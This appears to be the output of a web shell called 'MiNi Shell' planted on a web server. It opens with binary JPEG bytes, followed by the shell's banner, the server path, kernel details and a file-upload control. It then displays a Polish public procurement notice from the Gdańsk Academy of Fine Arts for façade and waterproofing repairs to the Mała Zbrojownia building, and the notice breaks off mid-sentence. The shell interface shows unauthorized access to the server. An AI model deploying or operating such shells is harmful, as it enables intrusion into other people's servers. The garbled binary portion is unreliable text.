JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250918/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250918/0043031101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont elewacji i izolacji przeciwwodnej budynku Małej Zbrojowni w Gdańsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Sztuk Pięknych w Gdańsku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000275820</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Targ Węglowy 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-836</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@asp.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.asp.gda.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont elewacji i izolacji przeciwwodnej budynku Małej Zbrojowni w Gdańsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7893b874-b949-4580-9a09-38b9078d2ab8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00430311</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00095972/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont elewacji na Małej Zbrojowni</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7893b874-b949-4580-9a09-38b9078d2ab8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">): https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-7893b874-b949-4580-9a09-38b9078d2ab8</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy Zamawiającym<br/>a Wykonawcami w postępowaniu o udzielenie zamówienia odbywa się przy użyciu Platformy e-Zamówienia, dostępnej pod adresem<br/>https://ezamowienia.gov.pl<br/>Pozostałe informacje znajdują się w rozdziale X SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. (RODO) informujemy, że administratorem danych osobowych jest Akademia Sztuk Pięknych w<br/>Gdańsku, ul. Targ Węglowy 6, 80-836 Gdańsk, tel. +48 58 301 28 01. Inspektorem ochrony danych jest Pan Paweł Domański,<br/>kontakt: iod@asp.gda.pl</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Z uwagi na podstawę prawną przetwarzania danych osobowych wynikającą z art. 6 ust. 1<br/>lit. c RODO oraz przepisy ustawy Pzp, osobom, których dane dotyczą, nie przysługuje prawo do usunięcia danych osobowych (art.<br/>17 ust. 3 lit. b, d, e RODO), prawo do przenoszenia danych (art. 20 RODO) ani prawo sprzeciwu wobec przetwarzania danych (art.<br/>21 RODO).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KZP/26/8/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest wykonanie robót budowlano-konserwatorskich polegających na „Remoncie elewacji i<br/>wykonaniu izolacji przeciwwodnej budynku Małej Zbrojowni w Gdańsku”, wpisanego do rejestru zabytków pod nr 432,<br/>zgodnie z dokumentacją projektową, dokumentacją konserwatorską oraz Specyfikacjami Technicznymi Wykonania i Odbioru<br/>Robót Budowlanych (SST).<br/>2) Zakres robót obejmuje w szczególności:<br/>a) wykonanie izolacji poziomej i pionowej ścian fundamentowych elewacji zachodniej,<br/>b) remont elewacji ceglanej – oczyszczenie, odgrzybianie, uzupełnienie i spoinowanie cegieł, hydrofobizacja,<br/>c) remont elewacji tynkowanej – naprawa i odtworzenie wypraw tynkarskich, malowanie,<br/>d) konserwację i naprawę detali architektonicznych z kamienia naturalnego oraz elementów metalowych,<br/>d) remont cokołów i opaski wokół budynku,<br/>e) naprawę i uzupełnienie elementów stolarki drzwiowej i bram,<br/>f) prace towarzyszące i przygotowawcze, w tym montaż i demontaż rusztowań, zabezpieczenie terenu robót oraz<br/>uporządkowanie terenu po zakończeniu prac.<br/>3) Szczegółowe parametry techniczne zamówienia określa dokumentacja projektowa, dokumentacja konserwatorska oraz<br/>SST stanowiące załączniki do SWZ i będące podstawą do sporządzenia oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45262512-3 - Kamieniarskie roboty wykończeniowe</p> <p class="mb-0">50760000-0 - Usługi napraw i konserwacji obiektów użyteczności społecznej</p> <p class="mb-0">45262690-4 - Remont starych budynków</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert dokonywana będzie w oparciu o kryteria oceny ofert określone w Specyfikacji Warunków<br/>Zamówienia (SWZ). Każda złożona oferta, która nie zostanie odrzucona i spełnia wszystkie wymagania formalne, podlegać będzie<br/>ocenie punktowej.<br/>Zamawiający dokonuje oceny ofert przyznając punkty w poszczególnych kryteriach oceny ofert zgodnie ze wzorami i zasadami<br/>określonymi w SWZ. Następnie uzyskane punkty w poszczególnych kryteriach są sumowane. Za ofertę najkorzystniejszą zostanie<br/>uznana ta, która uzyska najwyższą liczbę punktów łącznie w ramach wszystkich kryteriów oceny ofert.<br/>Ocena odbywać się będzie w następujący sposób:<br/>Cena – kryterium to oceniane będzie według zasady proporcjonalności, tj. oferta o najniższej cenie otrzyma maksymalną liczbę<br/>punktów przewidzianą dla tego kryterium, a pozostałe oferty odpowiednio mniejszą liczbę punktów obliczoną zgodnie z formułą<br/>wskazaną w SWZ.<br/>Pozostałe kryteria jakościowe (jeżeli przewidziane w SWZ) – oceniane będą według szczegółowych zasad opisanych w SWZ, w tym<br/>w szczególności poprzez przypisanie punktów na podstawie spełnienia wymagań, parametrów lub deklaracji wykonawców zawartych<br/>w formularzu ofertowym lub innych dokumentach. Kryteria te mają charakter mierzalny i pozwalają na porównanie ofert w sposób<br/>przejrzysty i jednoznaczny.<br/>Łączna punktacja oferty będzie wynikiem zsumowania punktów przyznanych w ramach wszystkich kryteriów. Maksymalna liczba<br/>punktów, jaką może uzyskać oferta, wynosi 100 pkt. Oferta z najwyższą punktacją łączną zostanie uznana za najkorzystniejszą.<br/>Zamawiający zastrzega, że w przypadku trybu podstawowego z możliwością negocjacji (art. 275 pkt 2 Pzp) negocjacje treści ofert<br/>mogą być prowadzone wyłącznie w zakresie kryteriów oceny ofert. Negocjacje nie mogą prowadzić do zmiany treści SWZ, a ich<br/>celem jest jedynie ulepszenie ofert złożonych przez wykonawców. Po zakończeniu negocjacji Zamawiający zaprosi wszystkich<br/>wykonawców, których oferty nie zostały odrzucone, do złożenia ofert dodatkowych.<br/>Oferta dodatkowa nie może być mniej korzystna w żadnym z kryteriów oceny ofert wskazanych w zaproszeniu do negocjacji niż<br/>oferta pierwotna. Ostateczna ocena ofert zostanie dokonana na podstawie ofert dodatkowych (lub ofert pierwotnych, jeżeli<br/>Zamawiający odstąpi od negocjacji).<br/>Zamawiający zapewnia, że ocena ofert dokonywana będzie zgodnie z zasadami uczciwej konkurencji, przejrzystości oraz równego<br/>traktowania wykonawców, a kryteria oceny ofert oraz sposób ich zastosowania nie będą prowadziły do dyskryminacji żadnego z<br/>wykonawców.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale VI SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w przedmiotowym zakresie.<br/>4) Zdolności technicznej lub zawodowej:<br/>a) Zamawiający uzna, że Wykonawca posiada niezbędne doświadczenie do realizacji zamówienia na odpowiednim<br/>poziomie jakości, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwa zamówienia odpowiadające swoim<br/>rodzajem robocie stanowiącej przedmiot zamówienia tj.: roboty budowlano-konserwatorskie lub remontowe w zakresie<br/>elewacji budynku murowanego, w tym co najmniej jedno zamówienie obejmujące obiekt wpisany do rejestru zabytków lub<br/>znajdujący się w strefie ochrony konserwatorskiej, o łącznej wartości brutto nie mniejszej niż 400 000 zł.<br/>W celu wykazania spełnienia przedmiotowego warunku Zamawiający żąda, aby wykonawca przedłożył wykaz robót<br/>budowlanych wraz z podaniem ich rodzaju, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie.<br/>UWAGA: W przypadku, gdy za wykonane przez Wykonawcę roboty rozliczenie nastąpiło w innej niż w PLN walucie,<br/>Wykonawca w celu potwierdzenia spełniania warunku udziału w niniejszym postępowaniu zobowiązany jest do przeliczenia<br/>wartości wykonanych dostaw przyjmując średni kurs złotego w stosunku do walut obcych określony w tabeli kursów<br/>średnich walut obcych Narodowego Banku Polskiego opublikowanych na dzień zamieszczenia ogłoszenia o zamówieniu<br/>oraz SWZ na platformie zakupowej Zamawiającego.<br/>oraz<br/>b) dysponuje co najmniej jedną osobą przewidzianą do pełnienia funkcji kierownika budowy, który:<br/>– posiada uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, w rozumieniu ustawy z dnia 7 lipca<br/>1994 r. – Prawo budowlane (tekst jednolity: Dz. U. z 2023 r. poz. 682 z późn. zm.), w specjalności konstrukcyjno-budowlanej<br/>bez ograniczeń,<br/>– posiada minimum 3-letnie doświadczenie w kierowaniu robotami budowlanymi w specjalności konstrukcyjno-budowlanej,<br/>– posiada co najmniej 18 miesięcy doświadczenia w kierowaniu robotami budowlanymi lub sprawowaniu nadzoru<br/>inwestorskiego przy zabytkach nieruchomych wpisanych do rejestru zabytków lub inwentarza muzeum będącego instytucją<br/>kultury – zgodnie z art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (tekst jednolity: Dz.<br/>U. z 2022 r. poz. 840 z późn. zm.)<br/>UWAGA:<br/>Przez uprawnienia budowlane rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w<br/>budownictwie, wydane na podstawie ustawy Prawo budowlane oraz rozporządzenia Ministra Infrastruktury i Rozwoju z dnia<br/>29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz.U z 2019 poz. 831) lub odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej<br/>obowiązujących przepisów i nadające takie same uprawnienia jak określone wyżej.<br/>UWAGA:<br/>W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą oni spełniać<br/>wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w<br/>budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach<br/>określonych w przepisach ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (tj. Dz. U. 2018 poz. 2272 ze zm.).<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do<br/>warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o<br/>braku podstaw do wykluczenia z postępowania – Załącznik nr 2 do SWZ (art. 125 ust. 1 Pzp).<br/>Oświadczenie o braku przynależności do tej samej grupy kapitałowej z innym Wykonawcą składającym ofertę albo oświadczenie o<br/>przynależności wraz z dokumentami potwierdzającymi niezależność ofert – Załącznik nr 4 do SWZ (art. 108 ust. 1 pkt 5 Pzp).<br/>Odpis lub informacja z KRS albo z CEIDG, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, w zakresie art. 109 ust. 1<br/>pkt 4 Pzp.<br/>W przypadku Wykonawców zagranicznych – dokumenty równoważne zgodnie z § 4 rozporządzenia Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. (Dz.U. poz. 2415).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – Załącznik nr 3 do SWZ (art. 125 ust. 1 Pzp).<br/>Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat (lub w okresie działalności, jeśli krótszy), z podaniem wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane, wraz z dowodami należytego wykonania<br/>(referencje lub inne dokumenty) – Załącznik nr 6 do SWZ.<br/>Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z informacjami o kwalifikacjach zawodowych/uprawnieniach, zakresie wykonywanych<br/>czynności i podstawie dysponowania tymi osobami – Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w SWZ,<br/>składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonają poszczególni wykonawcy – załącznik nr 8 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie – załącznik nr 2 i 3 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w zakresie określonym w art. 455 ustawy Prawo<br/>zamówień publicznych, przy czym wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności oraz zgody obu<br/>Stron, wyrażonej w formie aneksu. Dopuszczalne są w szczególności następujące zmiany:<br/>Zmiana warunków płatności wynagrodzenia – w przypadku wydłużenia terminu realizacji bez winy Wykonawcy,<br/>konieczności wykonania robót dodatkowych, zaniechanych lub zamiennych wpływających na harmonogram, a także z uwagi<br/>na obiektywnie uzasadnione okoliczności, w tym zalecenia organów administracji lub nadzoru 